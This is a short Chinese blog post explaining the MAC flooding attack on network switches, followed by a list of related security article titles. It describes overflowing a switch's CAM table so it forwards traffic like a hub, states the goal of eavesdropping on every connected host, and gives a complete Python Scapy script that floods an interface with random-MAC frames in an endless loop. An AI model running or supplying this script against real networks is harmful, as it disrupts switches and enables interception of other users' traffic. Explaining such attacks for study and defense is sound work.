MAC洪水攻击
2023-09-14 09:08:52 时间
MAC洪水攻击原理
传统的交换机在数据转发过程中依靠对CAM表的查询来确定正确的转发接口,一旦在查询过程中无法找到相关的目的MAC对应的条目,此数据帧将作为广播帧来处理,CAM表的容量有限,只能存储不多的条目,当CAM表记录的MAC地址达到上限时,新的条目将不会添加到CAM表中。
基于以上原理,某台PC不断发送去往未知目的地地数据帧,且每个包地源MAC地址都不同,当这样地数据包发送地速度足够快之后,快到在刷新时间内将交换机地CAM表迅速填满。CAM表被这些伪造的MAC地址占据,真实的MAC地址条目却无法进入CAM表。那么任何一个经过交换机的正常单播数据帧都会以广播帧的形式来处理。交换机在此情况下被降级为Hub。
交换机降级为hub之后,我们就可以监听所有连接到该交换机的主机的数据了。
#!/usr/bin/python
import sys
from scapy.all import *
packet = Ether(src=RandMAC("*:*:*:*:*:*"),
dst=RandMAC("*:*:*:*:*:*")) / \
IP(src=RandIP("*.*.*.*"),
dst=RandIP("*.*.*.*")) / \
ICMP()
if len(sys.argv) < 2:
dev = "eth0"
else:
dev = sys.argv[1]
print "Flooding net with random packets on dev " + dev
sendp(packet, iface=dev, loop=1)
相关文章
- python-Flask模版注入攻击SSTI(python沙盒逃逸)
- Memcached服务器UDP反射放大攻击
- CSRF攻击详解(转)
- 避免XSS攻击
- 使用Discuz!自带参数防御CC攻击以及原理,修改Discuz X 开启防CC攻击后,不影响搜索引擎收录的方法
- 重新整理 .net core 实践篇————防跨站脚本攻击[四十]
- DHCP服务洪水攻击
- 29.极具破坏力的DDoS:浅析其攻击及防御
- 奇安信EDR——ATT&CK框架攻击技术覆盖面164个、勒索病毒查杀率100%,可看到attck覆盖率,另外还报了钓鱼邮件攻击
- nishang中的bypass模块,原来就是为了针对AMSI接口啊——AMSI专门是检测无文件攻击的,尤其是可以扫描一些string,看编码绕过后的真正执行内容是否恶意!
- LNK无文件攻击形态——压缩文件中有lnk文件
- 无文件攻击——漏洞型攻击、灰色工具、潜伏型攻击
- 可以通过shadowserver来查看开放的mdns(用以反射放大攻击)——中国的在 https://mdns.shadowserver.org/workstation/index.html